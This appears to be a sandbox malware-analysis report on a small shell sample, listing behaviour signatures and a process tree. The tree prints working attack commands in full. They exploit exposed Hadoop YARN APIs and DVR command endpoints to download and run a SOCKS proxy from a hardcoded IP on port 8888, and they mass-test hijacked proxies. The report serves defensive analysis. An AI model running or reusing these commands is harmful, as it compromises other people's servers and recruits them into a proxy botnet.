Analysis

  • max time kernel
    13s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20260513-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20260513-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    22/08/2026, 14:06

General

  • Target
    c48b75abb560cd0a60a5c752e29730ae54e8454a024a60ca413fde9fe8a14508
  • Size 3KB
  • Sample260822-rertkavfjg
  • SHA256 c48b75abb560cd0a60a5c752e29730ae54e8454a024a60ca413fde9fe8a14508
  • MD5 SHA1 SHA512 TLSH

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 2 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads CPU attributes 1 TTPs 1 IoCs
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 6 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to shm directory 9 IoCs

    Malware can drop malicious files in the shm directory which will run directly from RAM.

  • Writes file to tmp directory 2 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/c48b75abb560cd0a60a5c752e29730ae54e8454a024a60ca413fde9fe8a14508
    /tmp/c48b75abb560cd0a60a5c752e29730ae54e8454a024a60ca413fde9fe8a14508
    1⤵
    • Writes file to shm directory
    • Writes file to tmp directory
    PID:714
    • /usr/bin/pgrep
      pgrep -f "masscan.*targeted"
      2⤵
      • Reads CPU attributes
      • Reads runtime system information
      PID:719
    • /bin/date
      date "+%H:%M:%S"
      2⤵
        PID:727
      • /bin/sleep
        sleep 5
        2⤵
          PID:729
        • /usr/bin/awk
          awk "{print \$4\":\"\$3}"
          2⤵
            PID:768
          • /bin/grep
            grep -v "^#" /dev/shm/.sys/raw.txt
            2⤵
              PID:767
            • /bin/date
              date "+%H:%M:%S"
              2⤵
                PID:772
              • /bin/grep
                grep ":8088\$" /dev/shm/.sys/ips.txt
                2⤵
                • System Network Configuration Discovery
                PID:775
              • /usr/bin/cut
                cut -d: -f1
                2⤵
                  PID:776
                • /usr/bin/cut
                  cut -d: -f1
                  2⤵
                    PID:780
                  • /bin/grep
                    grep ":8080\$" /dev/shm/.sys/ips.txt
                    2⤵
                    • System Network Configuration Discovery
                    PID:779
                  • /usr/bin/cut
                    cut -d: -f1
                    2⤵
                      PID:785
                    • /bin/grep
                      grep ":80\$" /dev/shm/.sys/ips.txt
                      2⤵
                      • System Network Configuration Discovery
                      PID:783
                    • /usr/bin/cut
                      cut -d: -f1
                      2⤵
                        PID:789
                      • /bin/grep
                        grep ":23\$" /dev/shm/.sys/ips.txt
                        2⤵
                        • System Network Configuration Discovery
                        PID:788
                      • /bin/date
                        date "+%H:%M:%S"
                        2⤵
                          PID:810
                        • /bin/cat
                          cat /dev/shm/.sys/pproxy.txt
                          2⤵
                            PID:813
                          • /usr/bin/xargs
                            xargs -P 500 "-I{}" sh -c "code=\$(curl -s -m 3 -o /dev/null -w \"%{http_code}\" -x http://{} http://httpbin.org/ip 2>/dev/null); [ \"\$code\" = \"200\" ] && echo {}"
                            2⤵
                            • Reads runtime system information
                            • System Network Configuration Discovery
                            PID:814
                          • /bin/cat
                            cat /dev/shm/.sys/p8080.txt /dev/shm/.sys/p80.txt
                            2⤵
                              PID:817
                            • /usr/bin/xargs
                              xargs -P 500 "-I{}" sh -c "for p in 80 8080; do code=\$(curl -s -m 3 -o /dev/null -w \"%{http_code}\" -x http://{}:\$p http://httpbin.org/ip 2>/dev/null); [ \"\$code\" = \"200\" ] && echo \"{}:\$p\" && break; done"
                              2⤵
                              • Reads runtime system information
                              • System Network Configuration Discovery
                              PID:819
                            • /usr/bin/sort
                              sort -u
                              2⤵
                                PID:818
                              • /usr/bin/sort
                                sort -u /dev/shm/.sys/verified_http.txt -o /dev/shm/.sys/verified_http.txt
                                2⤵
                                  PID:822
                                • /bin/date
                                  date "+%H:%M:%S"
                                  2⤵
                                    PID:826
                                  • /bin/cat
                                    cat /dev/shm/.sys/p8088.txt
                                    2⤵
                                      PID:827
                                    • /usr/bin/xargs
                                      xargs -P 100 "-I{}" sh -c " resp=\$(curl -s -m 5 \"http://{}:8088/ws/v1/cluster/info\" 2>/dev/null) echo \"\$resp\" | grep -q clusterInfo && { app=\$(curl -s -m 5 -X POST \"http://{}:8088/ws/v1/cluster/apps/new-application\" 2>/dev/null) appid=\$(echo \"\$app\" | python3 -c \"import json,sys;print(json.load(sys.stdin).get(\\\"application-id\\\",\\\"\\\"))\" 2>/dev/null) [ -n \"\$appid\" ] && { cmd=\"wget http://159.89.206.122:8888/microsocks -O /tmp/.ms;chmod +x /tmp/.ms;/tmp/.ms -p 1080 &\" curl -s -m 5 -X POST \"http://{}:8088/ws/v1/cluster/apps\" -H \"Content-Type: application/json\" -d \"{\\\"application-id\\\":\\\"\$appid\\\",\\\"application-name\\\":\\\"svc\\\",\\\"am-container-spec\\\":{\\\"commands\\\":{\\\"command\\\":\\\"\$cmd\\\"}},\\\"application-type\\\":\\\"YARN\\\"}\" 2>/dev/null sleep 5 check=\$(curl -s -m 5 -x socks5://{}:1080 http://httpbin.org/ip 2>/dev/null) echo \"\$check\" | grep -q origin && echo \"{}:1080\" >> /dev/shm/.sys/yarn_exploited.txt } } "
                                      2⤵
                                      • File and Directory Permissions Modification
                                      • Reads runtime system information
                                      PID:828
                                    • /bin/date
                                      date "+%H:%M:%S"
                                      2⤵
                                        PID:831
                                      • /bin/cat
                                        cat /dev/shm/.sys/p80.txt /dev/shm/.sys/p8080.txt
                                        2⤵
                                          PID:832
                                        • /usr/bin/sort
                                          sort -u
                                          2⤵
                                            PID:833
                                          • /usr/bin/xargs
                                            xargs -P 200 "-I{}" sh -c " for path in /dvr/cmd /cn/cmd; do resp=\$(curl -s -m 3 \"http://{}\$path\" 2>/dev/null) if [ -n \"\$resp\" ]; then curl -s -m 3 -X POST \"http://{}\$path\" -d \"cmd=wget http://159.89.206.122:8888/microsocks -O /tmp/.ms;chmod +x /tmp/.ms;/tmp/.ms -p 1080 &\" 2>/dev/null sleep 3 check=\$(curl -s -m 5 -x socks5://{}:1080 http://httpbin.org/ip 2>/dev/null) echo \"\$check\" | grep -q origin && echo \"{}:1080\" && break fi done "
                                            2⤵
                                            • File and Directory Permissions Modification
                                            • Reads runtime system information
                                            PID:834
                                          • /bin/date
                                            date "+%H:%M:%S"
                                            2⤵
                                              PID:838
                                            • /bin/cat
                                              cat /dev/shm/.sys/verified_http.txt /dev/shm/.sys/yarn_exploited.txt /dev/shm/.sys/dvr_exploited.txt /tmp/global.txt
                                              2⤵
                                                PID:839
                                              • /usr/bin/sort
                                                sort -u
                                                2⤵
                                                  PID:840
                                                • /bin/mv
                                                  mv /tmp/global_new.txt /tmp/global.txt
                                                  2⤵
                                                    PID:841
                                                  • /bin/sed
                                                    sed -i "s#^.*://##" /tmp/global.txt
                                                    2⤵
                                                    • Writes file to tmp directory
                                                    PID:842
                                                  • /bin/date
                                                    date "+%H:%M:%S"
                                                    2⤵
                                                      PID:843
                                                    • /usr/bin/wc
                                                      wc -l
                                                      2⤵
                                                        PID:851
                                                      • /bin/date
                                                        date "+%H:%M:%S"
                                                        2⤵
                                                          PID:852

                                                      Network

                                                            MITRE ATT&CK Enterprise v16

                                                            Replay Monitor

                                                            Loading Replay Monitor...

                                                            Downloads